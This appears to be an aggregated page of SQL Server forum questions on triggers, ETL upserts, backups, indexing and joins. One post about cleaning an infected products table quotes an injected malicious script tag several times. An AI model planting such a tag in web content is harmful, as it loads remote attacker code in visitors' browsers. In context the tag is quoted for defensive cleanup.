Creating Update Strategy In ETL
Apr 3, 2008
hello all, I need help to implement this package that will update/add/delete a row from one table to another.
I'm trying to create this package:
Insert an entire row using SSIS from one table to another based on condition:
A for add, D for delete, C for change
MASStable

Column0 | FirstName | LastName | MiddleName
--------+-----------+----------+-----------
A       | John      | daniels  |
D       | sarah     | jones    | G
C       | yann      | coleman  | J
        | daniel    | lope     |
If Column0 = 'A' in MASStable, add the entire row to Deathtable
If Column0 = 'D' in MASStable, delete the row from Deathtable where MASStable.LastName = Deathtable.LastName
If Column0 = 'C' in MASStable, update the row (some columns) where MASStable.LastName = Deathtable.LastName
If Column0 = ' ', no tasks..
This is my master table:
Deathtable

Column0 | FirstName | LastName | MiddleName
--------+-----------+----------+-----------
        | Juan      | danring  |
        | sarah     | jones    | G
        | yann      | coleman  |
        | daniel    | lope     |
Do you have a hint?
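For reference, the A/D/C routing above maps to three plain T-SQL statements (a sketch only, using the columns shown; in an SSIS package the usual equivalent is a Conditional Split feeding an OLE DB Destination for the adds and OLE DB Command transforms for the deletes/changes):
Code:
-- A: add the entire row
INSERT INTO Deathtable (Column0, FirstName, LastName, MiddleName)
SELECT Column0, FirstName, LastName, MiddleName
FROM MASStable
WHERE Column0 = 'A'

-- D: delete matching rows
DELETE d
FROM Deathtable d
JOIN MASStable m ON m.LastName = d.LastName
WHERE m.Column0 = 'D'

-- C: update some columns on matching rows
UPDATE d
SET d.FirstName = m.FirstName, d.MiddleName = m.MiddleName
FROM Deathtable d
JOIN MASStable m ON m.LastName = d.LastName
WHERE m.Column0 = 'C'

-- blank Column0: no action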
View 4 Replies
Aug 16, 2004
I need help writing an Update trigger that puts the current date in a changed record. I understand the basic idea but can't seem to get it to work. Any help would be greatly appreciated
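A minimal sketch of such a trigger; the table, key, and date column names here (dbo.MyTable, ID, ModifiedDate) are placeholders for your own:
Code:
CREATE TRIGGER trg_SetModifiedDate ON dbo.MyTable
FOR UPDATE
AS
-- stamp each changed record with the current date/time
UPDATE t
SET ModifiedDate = GETDATE()
FROM dbo.MyTable t
JOIN inserted i ON i.ID = t.ID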
View 1 Replies
View Related
May 22, 2008
I have a problem with triggers; I've never done them before except at school!
One of our client's servers has the same database name (WeighBridge) on different instances (one has Express and the other three have SQL 2005). There is a weighbridge scale writing to the SQL Express database.
I want to create a trigger that automatically updates the other SQL 2005 databases every time there is a weighbridge scale reading.
If someone can help, please share some code or tell me what to do.
Do I create the trigger on a table or on the database?
Please help!
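One common approach is an INSERT trigger on the Express database that writes through linked servers to the other instances. A sketch only: the linked server (SERVER2, created beforehand with sp_addlinkedserver) and the table/column names are assumptions, and note that each insert then becomes a distributed transaction (MSDTC), so replication may be the more robust long-term answer:
Code:
CREATE TRIGGER trg_PushScaleReading ON dbo.ScaleReadings  -- assumed table name
AFTER INSERT
AS
-- copy the new scale reading to the same table on another instance
INSERT INTO SERVER2.WeighBridge.dbo.ScaleReadings (ReadingID, Weight, ReadAt)
SELECT ReadingID, Weight, ReadAt
FROM inserted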
View 11 Replies
View Related
May 30, 2006
Hello
I am new to SQL and ASP. I am using Visual Web Developer and have a table such that, when it gets changed, I would like to see another table populated with the information. These are the two tables I have.
The first one has the information in it that users will insert:
asset_id int Unchecked
asset_desc varchar(50) Checked
serial_no varchar(50) Unchecked
model_no varchar(50) Checked
category bigint Unchecked
Manufacturer varchar(50) Checked
Mac_address varchar(50) Checked
service_pack varchar(50) Checked
owner bigint Unchecked
location bigint Unchecked
date_acquired datetime Checked
date_deactivated datetime Checked
system_asset_no varchar(50) Checked
cs_desc varchar(50) Checked
vendor varchar(50) Checked
modified_date datetime Checked
action varchar(50) Checked
The next table is the one I want the information to go into:
history_asset_id int Unchecked
history_asset_desc varchar(50) Checked
history_serial_no varchar(50) Checked
history_model_no varchar(50) Checked
history_category bigint Checked
history_manufacturer varchar(50) Checked
history_mac_address varchar(50) Checked
history_service_pack varchar(50) Checked
history_owner bigint Checked
history_location bigint Checked
history_date_acquired datetime Checked
history_date_deactivated datetime Checked
history_system_asset_no varchar(50) Checked
history_cs_desc varchar(50) Checked
history_vendor varchar(50) Checked
[modified date] datetime Checked
action varchar(50) Checked
The column action is for the name of the person updating, and modified_date is the system date. My trigger is this:
Create TRIGGER Trigger4
ON dbo.t_asset
FOR INSERT /* INSERT, UPDATE, DELETE */
AS
/* Inside a trigger the new rows come from the "inserted" pseudo-table, not from
   @variables, and the INSERT must target the history table itself (the name below
   is assumed) rather than a column name. Columns follow the two layouts above. */
INSERT INTO dbo.t_asset_history
(history_asset_id, history_asset_desc, history_serial_no, history_model_no, history_category, history_manufacturer, history_mac_address, history_service_pack, history_owner, history_location, history_date_acquired, history_date_deactivated, history_system_asset_no, history_cs_desc, history_vendor, [modified date], action)
SELECT asset_id, asset_desc, serial_no, model_no, category, Manufacturer, Mac_address, service_pack, owner, location, date_acquired, date_deactivated, system_asset_no, cs_desc, vendor, GETDATE(), action
FROM inserted
Can anyone please help me or point me in the right direction, rbynum@kansascommerce.com
View 3 Replies
View Related
Aug 21, 2006
I created an application based on an existing database, and I made a lot of changes to the database. Now I need to create scripts in the new database to use to update the old database. For example, I added 15 fields to 1 of the tables. Is there a way to use Tasks -> Generate Scripts to create a script that will check the existence of each column and create it if it does not exist? I tried multiple ways of doing this, but it will only create columns for tables that do not exist in the old database. If a table exists, none of the new columns are added.
I may be going about doing this wrong. The main goal I am trying to accomplish is to get all of the data that is in the old database (it was in use while the new one was being developed, so there is a lot of data in the old database that I need to have in the new one) into the new one.
Am I better off creating a blank database, then exporting all of the data from the old database to the new one? Will this create any problems with my Primary Keys (they are all auto-increment Integers)?
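For the column additions, one hand-rolled pattern makes the script safe to re-run (a sketch; the table and column names are placeholders):
Code:
-- add the column only if it is missing
IF NOT EXISTS (SELECT 1 FROM INFORMATION_SCHEMA.COLUMNS
               WHERE TABLE_NAME = 'MyTable' AND COLUMN_NAME = 'NewColumn')
BEGIN
    ALTER TABLE dbo.MyTable ADD NewColumn int NULL
END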
View 4 Replies
View Related
Feb 1, 2008
So I've created a bit of code to remove some virus garbage that's been plaguing some of my clients, but it seems that since I've tried using a cursor to streamline the process a bit, it's just filling in the fields with NULLs.
Code:
use db7021
go
select * from products
go
declare @desc varchar(max)
declare @virus varchar(128)
set @virus = '<script src="http://b.njnk.net/E/J.JS"></script>'
declare @start int
declare @end int
declare thecursor CURSOR LOCAL SCROLL_LOCKS
for select cdescription from products
where cdescription like ('%' + @virus + '%')
for update of cdescription
open thecursor
fetch next from thecursor into @desc
while @@FETCH_STATUS = 0
begin
print @desc
set @start = charindex(@virus, @desc)
set @end = @start + len(@virus)
print cast(@start as char) + ', ' + cast(@end as char)
set @desc = left(@desc, @start - 1) + right(@desc, len(@desc)-@end+1)
update products
set cdescription = @desc
where current of thecursor
fetch next from thecursor into @desc
end
close thecursor
deallocate thecursor
select * from products
go
Which produces the output:
Code:
id cname cdescription
----------- ----------- ----------------------------------------------------------------------------------------
1 banana sometext 0.962398 <script src="http://b.njnk.net/E/J.JS"></script>
2 apple sometext 1.9248 <script src="http://b.njnk.net/E/J.JS"></script>
3 lolcat sometext 2.88719 <script src="http://b.njnk.net/E/J.JS"></script>
4 cheezburgr sometext 3.84959 <script src="http://b.njnk.net/E/J.JS"></script>
(4 row(s) affected)
sometext 0.962398 <script src="http://b.njnk.net/E/J.JS"></script>
41 , 89
(1 row(s) affected)
sometext 1.9248 <script src="http://b.njnk.net/E/J.JS"></script>
41 , 89
(1 row(s) affected)
sometext 2.88719 <script src="http://b.njnk.net/E/J.JS"></script>
41 , 89
(1 row(s) affected)
sometext 3.84959 <script src="http://b.njnk.net/E/J.JS"></script>
41 , 89
(1 row(s) affected)
id cname cdescription
----------- ------------ ------------
1 banana NULL
2 apple NULL
3 lolcat NULL
4 cheezburgr NULL
(4 row(s) affected)
I trimmed out a lot of whitespace from the results for the sake of readability, but aside from that this is everything I've got. I know the string functions work since I tested them on their own, but since I've combined them with the cursor they've started producing NULLs.
Maybe I've missed something in the syntax for cursors?
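For what it's worth, this particular cleanup doesn't need a cursor at all; a set-based REPLACE avoids the row-by-row string surgery entirely (a sketch against the same products table):
Code:
DECLARE @virus varchar(128)
SET @virus = '<script src="http://b.njnk.net/E/J.JS"></script>'
-- strip the injected tag in one pass; only matching rows are touched
UPDATE products
SET cdescription = REPLACE(cdescription, @virus, '')
WHERE cdescription LIKE '%' + @virus + '%'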
View 2 Replies
View Related
Jul 20, 2005
I am extremely new at SQL Server 2000 and T-SQL and I'm looking to create a simple trigger. For explanation's sake, let's say I have 3 columns in one table... Col_1, Col_2 and Col_3. The data type for Col_1 and Col_2 is bit and Col_3 is char. I want to set a trigger on Col_2 to compare Col_1 to Col_2 when Col_2 is updated, and if they're the same, set the value of Col_3 to "Completed". Can someone please help me? Thanks, Justin
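A minimal sketch of such a trigger, assuming the table is dbo.MyTable with a primary key column ID to join on (substitute your real names):
Code:
CREATE TRIGGER trg_SetCompleted ON dbo.MyTable
FOR UPDATE
AS
IF UPDATE(Col_2)  -- only act when Col_2 was part of the UPDATE
    UPDATE t
    SET Col_3 = 'Completed'
    FROM dbo.MyTable t
    JOIN inserted i ON i.ID = t.ID
    WHERE i.Col_1 = i.Col_2  -- the two bit columns match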
View 7 Replies
View Related
Oct 23, 2014
I am attempting to update a table that drives a report. The report is at the order level. An order can have several types of demand (revenue $): Ship and/or Backordered. When I update one of these demand fields on the report table, I would expect the orders that have that type of demand to update, and the orders that don't to remain at their current value ($0 in this example, which is the table default). But what is happening is that orders that don't have that type of demand are changing to NULL. What am I doing wrong with my update statement that is causing this?
Code:
CREATE TABLE #sales(
OrdNo int,
StatusGrp varchar(10),
Demand decimal(10,2)
)
INSERT INTO #sales
VALUES (1,'Ship',100.00)
[Code] .....
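The UPDATE itself is elided above, but this symptom usually points to a correlated-subquery assignment, which returns NULL for orders that have no matching demand. A join-based update (a sketch; the report table and demand column names are assumed) touches only the matching orders and leaves everything else at its default:
Code:
-- only orders that actually have 'Ship' demand are updated;
-- all other rows keep their current ($0 default) value
UPDATE r
SET r.ShipDemand = s.Demand      -- assumed column name
FROM dbo.OrderReport r           -- assumed report table
JOIN #sales s ON s.OrdNo = r.OrdNo
WHERE s.StatusGrp = 'Ship'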
View 6 Replies
View Related
Dec 3, 2005
Hi,
I use the SqlDataSource control for generating SQL statements that I
can easily modify. But on some tables I can't autogenerate the
statements for Insert, Delete and Update. The checkbox is dimmed/not
enabled. Why can't I use the autogenerate feature on some tables?
Best regards,
I really like asp.net 2.0!
View 1 Replies
View Related
Oct 13, 2013
I need help creating an update trigger that involves two tables and a few fields.
tblCases
Fields
Defendent1
Defendent2
Defendant3
tblCaseBillingDetails
Fields
DefCount
I would like to create the trigger on tblCaseBillingDetails so that when the data in the Defendant fields is updated, the trigger fires and updates the defendant count, DefCount.
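A sketch of one way to do it. Since the Defendant columns live on tblCases, the trigger has to be defined there, writing the count into tblCaseBillingDetails; the shared key column (CaseID below) is an assumption:
Code:
CREATE TRIGGER trg_UpdateDefCount ON dbo.tblCases
AFTER UPDATE
AS
IF UPDATE(Defendent1) OR UPDATE(Defendent2) OR UPDATE(Defendant3)
    UPDATE b
    SET DefCount = CASE WHEN i.Defendent1 IS NOT NULL THEN 1 ELSE 0 END
                 + CASE WHEN i.Defendent2 IS NOT NULL THEN 1 ELSE 0 END
                 + CASE WHEN i.Defendant3 IS NOT NULL THEN 1 ELSE 0 END
    FROM dbo.tblCaseBillingDetails b
    JOIN inserted i ON i.CaseID = b.CaseID  -- assumed join key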
View 1 Replies
View Related
May 5, 2015
Looking to write a query that will update a field for multiple items, like 1,500.
something like:
UPDATE INMAST
SET FPRICE = 111.11
WHERE
INMAST.FPARTNO = 'xxx'
The only issue I'm having is that I need to do a JOIN because there's one more condition that must be met from another table. I've tried this:
SET FPRICE = 111.11
JOIN INVCUR
ON
(inmast.fpartno + inmast.frev)= (invcur.fcpartno + invcur.fcpartrev)
WHERE
INMAST.FPARTNO = 'NRE'
AND
invcur.flanycur = 'TRUE'
but that is giving me an error around the JOIN
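The error is because a joined UPDATE in T-SQL needs a FROM clause; a corrected sketch of the statement above:
Code:
UPDATE INMAST
SET FPRICE = 111.11
FROM INMAST
JOIN INVCUR
    ON (inmast.fpartno + inmast.frev) = (invcur.fcpartno + invcur.fcpartrev)
WHERE INMAST.FPARTNO = 'NRE'
  AND invcur.flanycur = 'TRUE'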
View 11 Replies
View Related
May 8, 2015
I have a table with ~30M records. I'm trying to add a column to the existing table with a default value and have noticed the following... When using ALTER with a default value, it executes for more than 45 min and is killed forcefully:
ex:
ALTER TABLE dbo.Table_X Add is_Active BIT CONSTRAINT DF_Table_X_is_Active DEFAULT 'FALSE' NOT NULL
GO
When using an UPDATE command after adding the column with ALTER (without a default value), it completes in 5 min.
ex:
ALTER TABLE dbo.Table_X Add is_Active BIT NULL
GO
UPDATE Table_X SET is_Active = 0 WHERE is_Active IS NULL
GO
Why is there so much difference in the execution times? I was just trying to understand the internal behavior of SQL Server in these two scenarios.
View 4 Replies
View Related
Mar 18, 2014
How do I create an SSIS package for an upsert -- that is, I want to do both update and insert operations against the database?
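In SSIS the usual shape is a Lookup transformation routing matched rows to an update and unmatched rows to the destination; for reference, the same upsert expressed in plain T-SQL (a sketch with assumed target/staging table and column names):
Code:
-- update rows that already exist in the target
UPDATE t
SET t.SomeCol = s.SomeCol
FROM dbo.TargetTable t
JOIN dbo.StagingTable s ON s.KeyCol = t.KeyCol

-- insert rows that do not exist yet
INSERT INTO dbo.TargetTable (KeyCol, SomeCol)
SELECT s.KeyCol, s.SomeCol
FROM dbo.StagingTable s
WHERE NOT EXISTS (SELECT 1 FROM dbo.TargetTable t WHERE t.KeyCol = s.KeyCol)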
View 4 Replies
View Related
Jul 18, 2000
Hi all,
Pardon me for asking a question that I know has been asked before. I need to develop a backup strategy for our SQL Server, and I am looking for any help that anyone can offer, including recommendations of good books to read.
Thanks in advance,
Faustina
View 1 Replies
View Related
Oct 18, 2000
In SQL Server 6.5, is it generally better to dump the
transaction log first, then the database, or to dump
the database and then run a dump 'tranlog with truncate
only' option?
Or, is this more a matter of personal choice?
Toni
View 1 Replies
View Related
May 30, 2006
Hi guys.
I am currently developing a system that stores exchange stats in a db. Since our customers are companies with 20 employees up to 5,000, there is a big difference in the volume of data that needs to be stored.
We are currently thinking of supplying a SQL Server Express DB to the small customers and suggesting a full SQL Server to the bigger ones.
But since I would like to use the same structure for both types of customers, I wonder how I should design the storage.
There could be from 500 records a day up to 20,000. They are quite simple records with only simple datatypes: about 15 fields with no more than 10 chars each, mostly 2.
Should I separate the data into different tables per week or day, etc.?
Since I am only going to filter data on 1 or 2 fields, the data will be easily indexed.
The reports generated will almost always use only 1-3 months of data, but historical reports have to be possible.
My question is of course:
What's the best solution for me?
Thanks in advance:)
/Johan Wendelstam
Sweden
View 10 Replies
View Related
Jul 23, 2005
I've recently inherited a position where I am responsible for the well-being of some DBs. 2 (much) more important than others.
The current recovery model, from what I can tell, is to do a full db/log backup overnight. This .bak file is then written to tape as well as saved on the disk for 2 days.
Both these dbs are used fairly extensively 8-5pm and losing data would not be good. The db sizes are approx 5gb and 3gb.
This doesn't seem like the ideal situation to me. Everything I read tells me... full backup periodically, differential nightly and transaction hourly. Agreed?
If so then I have 2 questions:
1. Is the best way to do this via a maintenance plan or by scripting and scheduling?
2. What, if any, overhead can be expected with regular transaction backups during work hours?
A bit of a pointer to #1 would be appreciated also.
Thanks.
View 4 Replies
View Related
Jun 12, 2006
I have a bit of a problem with regards to an indexing strategy. Well, basically there is no indexing strategy on a set of data I have at work. Now, I didn't create the design as I would have allowed for this. OK, so there are primary key (clustered) indexes (mainly composite keys), but no other indexes on the tables. As you would expect, the performance leaves a lot to be desired. A hell of a lot. We have several million rows in a lot of the tables. None of the queries seem to be overly complex so we can work through the applications at a later stage.
We have multiple copies (one per client per country) of the same structure (I may have considered combining these to allow better performance). One specific SP that I need to run takes 40+ hours without indexes and 5 hours with some (130) basic indexes to get us started on a better design. These 130 indexes are the minimum I suspect we need and from there, we can start to work out which ones we need. Now the test database (our worst performer) doubles in size to 20Gb, but the performance is much much better (as expected). The original thinking behind the design was for storage concerns (server space recently upgraded) and for performance with bulk inserts.
We have a lot of bulk inserts, but I suspect that these are not too bad, and the time taken for indexing these is negligible due to the performance gains. I strongly suspect that we have a considerable amount of table scans going on, but the problem is that people here don't understand indexing (yet) or have the time (probably because it's all taken up using the poorly designed system). That's a whole separate issue for me to address.
So, finally getting round to my questions...
Is there any good reference explaining in layman's terms why you need basic (or advanced) indexing? Any links would be appreciated. I need this to help explain to colleagues why a disk space increase and indexing will be far better than spending thousands on a new box and doing the same (a common problem I suspect).
How can I accurately estimate the amount of time taken to update an index once data is bulk inserted? I don't want to re-index from scratch as this may take too long. Indexing my database first time round takes about 1 hour 30 minutes.
It's all part of an ongoing bit of digging into the system and re-doing it to make it work properly. I'm sure most of you will have been there at some point or another.
Thanks
Ryan
View 7 Replies
View Related
May 23, 2007
We are currently doing daily full backups of system & custom databases since the database size is small. Is that a good idea? Or would the better option be weekly full & daily incremental?
Do we need to do any special backups of the system databases or transaction logs?
Please advise
View 30 Replies
View Related
Nov 1, 2007
Hi
I have a concern about an SQL server. The server has the operating system and SQL Server installed locally. The database and transaction log files are stored on a SAN. We used to have the database backup and transaction log backups stored locally on the server. We write the database backup and transaction logs to tape every 24h. If we lose the SAN and the server, then we are stuck with no backup easily accessible, and on tape we lose up to 24h of data. We decided to put up a stand-alone server with no connection to the SAN and dump the backup files on this server. We also put up a secondary SQL server in case of emergency, to test backups. We are looking at getting a mirroring or log shipping solution but we are not there yet; next year's budget. We are still using some old servers left from migrating to virtualization.
Then I read in the "Practical Troubleshooting: The Database Engine" book the best practice to avoid network-drive backups. Stuck again. Back to backing up to a local drive and robocopying the files? Keep them on the network drive? Start using MIRROR TO in the BACKUP DATABASE statement? Today we are using the Backup Database Task in SSIS.
Advice?
Regards
Johan
View 4 Replies
View Related
May 21, 2007
I am running SQL Server 2005 x64 Enterprise under Windows Server 2003 x64 Enterprise. After reviewing many posts and suggestions in this forum, I am developing a backup strategy that should include keeping my transaction log file at a manageable size.
Please examine the following proposed backup schedule and let me know if this is considered a sound plan. The scripts below will write to disk, and each night the files will be backed up to tape.
*** TASK 1 ***
Backup transaction log
/* This script backs up the DSS database transaction log to disk, overwriting any
previous backup
*/
BACKUP LOG [DSS]
TO DISK = N'g:\mssql\backup\log\dss_log.bak'
WITH
INIT
, NAME = N'DSS-Transaction Log Backup'
GO
*** TASK 2 ***
/* This script shrinks the DSS database transaction log file
*/
BACKUP LOG [DSS] with truncate_only
dbcc shrinkfile(DSS_log)
**** TASK 3 ****
/* This script backs up the DSS database to disk, overwriting any
previous backup
*/
BACKUP DATABASE [DSS]
TO DISK = N'g:\mssql\backup\database\DSS.bak'
WITH DESCRIPTION = N'DSS Full Database Backup'
, INIT
, NAME = N'DSS - Full Database Backup'
GO
/* Backup validation to ensure the file is valid before storing it */
RESTORE VERIFYONLY
FROM DISK = N'g:\mssql\backup\database\DSS.bak'
WITH FILE = 1
GO
*** TASK 4 ***
Update statistics on the DSS database
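(Task 4 is listed without a script; a minimal sketch using the built-in procedure:)
Code:
USE DSS
GO
-- refresh out-of-date statistics on all tables in the database
EXEC sp_updatestats
GO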
View 3 Replies
View Related
Apr 23, 2008
Currently I have 1 server running MSSQL 2005 Standard. There is no redundancy in my current solution. I'm working on a project that involves a separate installation. I have 3 goals:
1) Provide redundancy for the new installation
2) Provide high availability for the new installation
3) Provide reduncancy for the current installation
Here's what I'm thinking about doing:
1) Purchase 2 servers and a Dell MD3000i ISCSI storage box. Cluster the servers and install SQL Server on the cluster.
2) Install SQL Server on an existing box (single CPU license) for backup purposes. Enable log shipping from the new cluster to the backup server.
3) Enable log shipping from the existing installation to the backup box.
I've also thought about offloading some of the static pricing operations to the backup installation. This would free up my existing installation to deal with the changing data.
A couple of questions:
-How does this strategy sound? Are there any configuration problems with it?
-Can I legally use a development edition for the backup installation (if all I do is log shipping to it)?
Any other comments are welcome.
Thanks!
Brian
View 14 Replies
View Related
Jun 15, 2007
This may seem like a silly question, but has anyone ever heard of a DBA or an Engineer deciding to not back up databases inside EM, and only relying on the RAID or third party software for redundancy?
SBS 2003 R2
SQL 2000
Veritas 8.6 open file agent, SQL agent, Exchange agent
Thanks for any input,
Rich
View 3 Replies
View Related
Mar 2, 2007
Hi,
In my current organisation they are using SQL Server.
They are using TSM (Tivoli Storage Manager) to back up the server on a nightly basis.
However, I feel that this is not the correct way. Suppose I need some data back; I call technical support and they would restore the server. If another user made some changes to another database that day, he would lose his changes.
Of course they could restore a file, but I am not sure if this is correct. What will happen to the transaction log, for example?
My idea is that they should back up the database using the normal SQL backup command, dump the data to a folder, and back up that folder.
Any suggestions, please?
Constantijn Enders
View 5 Replies
View Related
Apr 22, 2007
I have been developing a genealogy application using a SQL Server 2000 database and ASP.NET 2.0. In this application a process, Ged.Parse, converts data from the GEDCOM standard format (a hierarchical file format that looks as if it was designed for 80-column cards) into my SQL Server database.
As we started to load reasonable quantities of data into the system we found that the on-line response became abysmal. This problem was fixed by defining a number of secondary indexes (response times dropped to under a second, from previously exceeding 2 minutes and often timing out). Unfortunately however the processing time of Ged.Parse then tripled, and it may now take up to an hour to process a GEDCOM. I believe that this is a byproduct of defining several indexes that are not needed by Ged.Parse itself, but which are of course maintained as Ged.Parse inserts new records into the database.
I am wondering what my best strategy is, apart from putting Ged.Parse into a background task and just letting it trickle away. (I will probably do this anyway). What I'd like to be able to do is to have Ged.Parse load records without creating the secondary indexes, and then create the indexes for the newly-added records as a penultimate step just before it makes them available for general use. Of course there is no way that you can do this: records in a table are either indexed or they are not.
Proposed change: recode Ged.Parse to load data into temporary tables, say NewPeople, NewFacts, etc., with these tables having only the indexes required by Ged.Parse. Then, as the last process in Ged.Parse, run a SQL procedure with code like:
Insert into People Select * From NewPeople
Delete from NewPeople
etc.
This is a reasonable amount of programming, so before I make this change could somebody tell me: will this be significantly faster overall, or is this likely to make little or no improvement compared to the present process in which Ged.Parse loads data directly into People, Facts, etc? Two facts that may influence the answer. First, all record relationships are through GUIDs, so records in NewPeople, NewFacts, etc would already have their final key values. Second: although Ged.Parse needs to form relationships between records, these relationships are only within the new records (created from the same GEDCOM), and Ged.Parse does not need to relate any of these new records to earlier records.
Thank you,
Robert Barnes.
View 2 Replies
View Related
Nov 27, 2000
Hi!
It would be very nice if some people out there, using
merge replication can tell me their strategy to get
started with a new subscriber. Is it a good way to copy
a publisher backup to the new subscriber and restore it
there and say that schema and data is already here when
creating the subscription?
I experienced some troubles when I tried to add a new
subscriber and used the initial snapshot transfer to
get the db to the new sub. (no defaults are transferred...???)
Or is it even better to use DTS?
I'd also be very grateful for information about RESCUE
STRATEGIES in case of a major database problem with replicated
databases!
Hoping for some answers. TIA & Best Regards
Gert
View 1 Replies
View Related
May 4, 1999
Hi All,
Can any one help me with this..
I've a critical application that can't be stopped for a second.
I'd like to have an implementation that uses 2 SQL 6.5 servers, one as a
standby which is ready and up to date to take over and run instead of the
master server when it's down; and when the master is back to work, it's
updated with the data entered on the standby.
This process must be automatic to the maximum extent.
Thanks
Mohamed
View 1 Replies
View Related
Oct 22, 2004
I am using SQL Server 2000 and trying to create a disaster recovery strategy that would run nightly and back up the database, or at least the changes, and would ftp these to a secure ftp site. For smaller databases it is easy: I just take a full backup, zip up the file, and ftp it to the secure backup site. This strategy does not work so well when the zipped-up database is still close to 3GB. I have a pretty big window for doing everything, but 3GB is just too much to ftp overnight. The recovery model is simple, so the only other option seemed to be to do a full backup once a month and take differentials nightly. The problem is that I am offsite and the client may need to take a full backup during the day, and my nightly differential would get screwed up.
There is a fairly low volume of transactions so the idea of just doing nightly backups on the data that has changed is the obvious choice but differentials don't seem to fit. Any ideas?
Thanks,
TH
View 2 Replies
View Related
Oct 20, 2006
Hi Folks,
The Need : Refresh a part of local database daily from remote server.
Assumption : All updates in remote are updated in local db as well.
Need inputs on the type of strategy
1) Take full backup of remote, refresh on local
( Downside for us is Network and disk space )
2) DTS ( refresh only the objects required )
Looks good to us, but does it take care of my assumption? Your suggestions welcome... I may be wrong
3) Replication (don't want to implement it on the already complicated scenario... so I'll pass)
4) Standby databases (??? Any help on this)
5) Any other
Thanks so much,
Warm Regards,
Ranjit.
--------------------------------------------------------------
The best moments of my life are often things I get paid for
View 3 Replies
View Related
Jun 14, 2007
My maintenance plans are starting to act weird. I'm building a custom script to manage the database backups on my server, but I'm curious if anybody has some sample work that will allow me to avoid re-inventing the wheel.
A couple of primary constraints:
I want to do a full backup daily (and only retain 1 day of full backups)
Transaction Log backups every 20 minutes
I'd like to loop through the databases on the server automatically to make this a little more flexible.
You have anything you'd like to share? Or, bits of knowledge worth sharing?
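A starting point for the database loop, since BACKUP DATABASE accepts variables for both the database and the file (a sketch; the backup path and retention are assumptions, and offline or system databases may need extra filtering):
Code:
DECLARE @name sysname, @file nvarchar(260)
DECLARE dbs CURSOR FOR
    SELECT name FROM master.dbo.sysdatabases WHERE name <> 'tempdb'
OPEN dbs
FETCH NEXT FROM dbs INTO @name
WHILE @@FETCH_STATUS = 0
BEGIN
    SET @file = N'D:\Backups\' + @name + N'.bak'     -- assumed path
    BACKUP DATABASE @name TO DISK = @file WITH INIT  -- INIT overwrites, keeping 1 day
    FETCH NEXT FROM dbs INTO @name
END
CLOSE dbs
DEALLOCATE dbs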
Please advise,
alex8675
View 3 Replies
View Related
Apr 18, 2008
Hi,
I have just created a logging table that I anticipate to have 10's of millions of rows (maybe 100's of millions eventually).
Basically its a very basic, narrow table, we are using it to log hits on images for a webserver.
My question is that we want to run queries that show how many rows are added per day, etc.; however, we want to make sure these queries, which we anticipate to be very heavy, do not slow down the system.
I have been recommended to have a seperate database (mirror/replica) for reporting so that the performance of regular activity will not be affected.
I assume this means I would need another server for this other database?
I am thinking there are probably some alternative solutions to this as well. Getting a dedicated server just for these queries really isn't an option.
In order to improve things, it is not a problem to make some sacrifices. For example, having the data update every 15 minutes is more than acceptable.
I see certain websites I use employ this strategy of making data update every 15 minutes, but I am unsure what is likely going on behind the scenes. Also the queries are lightning fast when run. I am thinking that they have some sort of table that is populated with some computed data, so it's quick to query.
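That guess is usually right: a small summary table refreshed on a schedule (e.g. a SQL Agent job every 15 minutes) keeps the reports off the big logging table. A sketch, with assumed table/column names:
Code:
CREATE TABLE dbo.HitsPerDay (
    HitDate  datetime NOT NULL PRIMARY KEY,
    HitCount int      NOT NULL
)
-- refresh job: rebuild the per-day counts from the raw log
TRUNCATE TABLE dbo.HitsPerDay
INSERT INTO dbo.HitsPerDay (HitDate, HitCount)
SELECT DATEADD(day, DATEDIFF(day, 0, HitTime), 0), COUNT(*)  -- day boundary
FROM dbo.ImageHits          -- assumed logging table
GROUP BY DATEADD(day, DATEDIFF(day, 0, HitTime), 0)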
Any thoughts or suggestions to give me some direction, are very much appreciated !
thanks once again,
Mike123
View 12 Replies
View Related
Oct 7, 2005
My SQL acumen stems from just a couple courses, and everything since from the trenches. Fun + angst over time.
I'm needing some advice on joins. Though I understand the basics, I'm having problems abstracting from instances where it's easy to think about discrete key values (. . . and studentid = 1234) to entire sets of users, with the joins doing their work.
For example, currently I'm going nuts trying to return dates for which attendance has not been taken for students, but should have been. Students have active and inactive periods of enrollment in our schools, so we have a history table of when they were active and inactive -- as well as two more tables that layer other bounds on eligible dates (what range of dates fall within a given school's term? What of holidays and staff institute days?). I also have a populated calendar table, and a table where students are identified. Finally, there's a site history table which is a REAL pain in the butt for me to think about.
CREATE TABLE Student (
    StudentID int IDENTITY(1,1) NOT NULL,
    CurrentStatus varchar(2) NOT NULL
)
CREATE TABLE Calendar (
    Dateid int NOT NULL,
    Date datetime NULL,
    Workday bit NULL
)
CREATE TABLE DailyAttendance (
    StudentID int NOT NULL,
    AttendanceDate datetime NOT NULL,
    SiteID varchar(6) NOT NULL,
    Attend_Status varchar(2) NOT NULL
)
(the last field is, e.g., present or absent)
CREATE TABLE StudentActivityHistory (
    StudentID int NOT NULL,
    StatusStartDate datetime NOT NULL,
    StatusEndDate datetime NULL,
    Activity_Status varchar(2) NULL,
    StudentStatusHistoryID int IDENTITY(1,1) NOT NULL
)
(the activity_status is either A or I; the important records in this table are the 'A' records. A student's most recent status record always has an end date of '12/31/9999 12:00:00 AM', whether that's an A or I record. No dates not between start/end dates of students' A records would need attendance taken. Students may have many periods of activity -- A records -- as well as many inactive periods.)
CREATE TABLE SiteTerms (
    SiteID varchar(6) NOT NULL,
    Term varchar(3) NOT NULL,
    StartOfTerm datetime NOT NULL,
    Quarter varchar(2) NOT NULL,
    SchoolYear varchar(9) NOT NULL,
    EndOfTerm datetime NOT NULL
)
(different schools vary their term start and end dates. No dates not between term start and end dates would need attendance taken by students assigned to and active in that school during that period.)
CREATE TABLE SiteExceptionDays (
    SiteID varchar(6) NOT NULL,
    SchoolDayStartTime datetime NOT NULL,
    SchoolDayEndTime datetime NOT NULL,
    SchoolDayType varchar(2) NOT NULL
)
(there are two kinds of days -- partial attendance, and no attendance. In short, if the type of day is "N" no attendance needs to be taken for students assigned to that school and active on that day)
CREATE TABLE StudentSiteHistory (
    StudentID int NOT NULL,
    SiteStartDate datetime NOT NULL,
    SiteID varchar(6) NOT NULL,
    SiteEndDate datetime NULL,
    StudentSiteHistoryID int IDENTITY(1,1) NOT NULL
)
(Pain. The attendance table tells which site a student was assigned when attendance was taken. To find which school a student was assigned to on days attendance was NOT taken, this table's implicated 'cause it's the only way of connecting everything else together)
Dangitall, I know this can be done but I've beat my head against the wall. Due diligence has gotten me a headache and a hankerin' for whiskey, and I'm not much of a drinker. Is there anyone in the group for whom this kind of thing is a no-brainer? I'd just as soon get some tips on how to approach this kind of thing, and figure it out myself with some guidance.
